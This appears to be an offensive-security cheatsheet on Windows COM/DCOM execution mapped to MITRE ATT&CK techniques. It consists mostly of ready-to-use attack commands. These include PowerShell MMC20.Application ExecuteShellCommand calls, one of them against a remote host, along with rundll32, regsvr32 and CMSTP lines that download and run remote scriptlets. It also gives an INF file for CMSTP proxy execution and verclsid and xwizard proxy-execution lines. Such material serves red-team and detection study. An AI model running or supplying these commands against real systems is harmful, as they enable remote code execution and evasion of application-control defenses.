# COM Execution - T1559.001 Windows Components Object Model quick execution cheatsheet ## Powershell Using Powershell with dotnet notation to quickly create a COM or DCOM instance using either CLSID or ProgID ### Execution via CLSID ```powershell $a = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("49B2791A-B1AE-4C90-9B8E-E860BA07F889")) $a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7") ``` ### Execution via ProgID ```powershell $a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1")) $a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7") ``` ### DCOM Execution Distributed COM is an extension of COM, which enables remote execution of COM among other things. Note that DCOM can also be executed **Locally** by specifying the loopback interface (127.0.0.1) ```powershell $a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.0.2")) $a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7") ``` ## Rundll32 ### Execution via CLSID ```powershell Rundll32.exe -sta {GUID} ``` ### Execution via ProgID ```powershell Rundll32.exe -sta Scripting.Dictionary ``` ### Execution via shell32.dll ```powershell # Using shell32 exported function Rundll32.exe shell32.dll,SHCreateLocalServerRunDll {GUID} ``` ### Scriptlet Execution from Remote Server ```powershell # Running Scriptlet via JavaScript -> GetObject() rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;document.write();GetObject(“script:http://127.0.0.1:8080/calc.sct").Exec(); ``` ### Remote Scriptlet via INF file ``` # with Rundll32 rundll32.exe advpack.dll,LaunchINFSection path\to\test.inf,DefaultInstall_SingleUser,1 ``` ## Regsvr32 ### COM Local Scriptlet Execution ``` # Running Scriptlet locally // without touching the registry regsvr32 /s /n /u /i:malware.sct ``` ### COM Scriptlet Execution from Remote Server ``` # COM Scriptlet via Regsvr32 from remote location // without touching the registry regsvr32 /s /n /u /i:http://server/file.sct C:\Windows\system32\scrobj.dll ``` ## CMSTP Execution via INF file that downloads and executes a scriptlet (sct) ``` # INF File # Running Scriptlet via CMSTP.exe INF-SCT file [version] Signature=$Chicago$ AdvancedINF=2.5 [DefaultInstall_SingleUser] UnRegisterOCXs=UnRegisterOCXSection [UnRegisterOCXSection] %11%\scrobj.dll,NI,http://127.0.0.1:8080/test.sct [Strings] AppAct = "SOFTWARE\Microsoft\Connection Manager" ServiceName="MalTrak" ShortSvcName="MalTrak" ``` ``` cmstp.exe /su test.inf ``` {% hint style="info" %} Credit to @Amr\_Thabet for the INF code {% endhint %} ## PyCOM {% hint style="warning" %} :tools: {% endhint %} ## Verclsid ### Execution via CLSID ``` verclsid.exe /S /C {CLSID} ``` ## Xwizard ### Execution via CLSID ``` xwizard.exe RunWizard /taero /u {CLSID} ``` ## ATT\&CK Techniques in this Page * Command and Scripting Interpreter: PowerShell - T1059.001 * Inter-Process Communication: Component Object Model - T1559.001 * System Binary Proxy Execution: CMSTP - T1218.003 * System Binary Proxy Execution: Rundll32 - T1218.011 * System Binary Proxy Execution: Verclsid - T1218.012 * System Binary Proxy Execution: Regsvr32 - T1218.010